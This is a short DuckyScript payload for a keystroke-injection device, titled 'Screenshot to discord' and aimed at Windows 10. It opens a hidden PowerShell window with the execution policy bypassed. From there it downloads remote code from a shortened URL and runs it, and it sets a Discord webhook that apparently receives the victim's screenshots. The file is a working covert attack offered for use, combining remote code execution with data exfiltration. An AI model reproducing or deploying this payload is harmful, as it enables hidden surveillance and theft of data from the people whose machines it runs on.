
REM ################################################################################
REM #                                                                              #
REM # Title        : Screenshot to discord.                                        #
REM # Author       : Murdervan                                                     #
REM # Link         : github.com/murdervan                                          #
REM # Target       : Windows 10                                                    #
REM #                                                                              #
REM ################################################################################


REM Setup for script

DEFAULT_DELAY 100

REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='YOUR_WEBHOOK_HERE'; irm https://tinyurl.com/3jhxf7sd | iex
ENTER


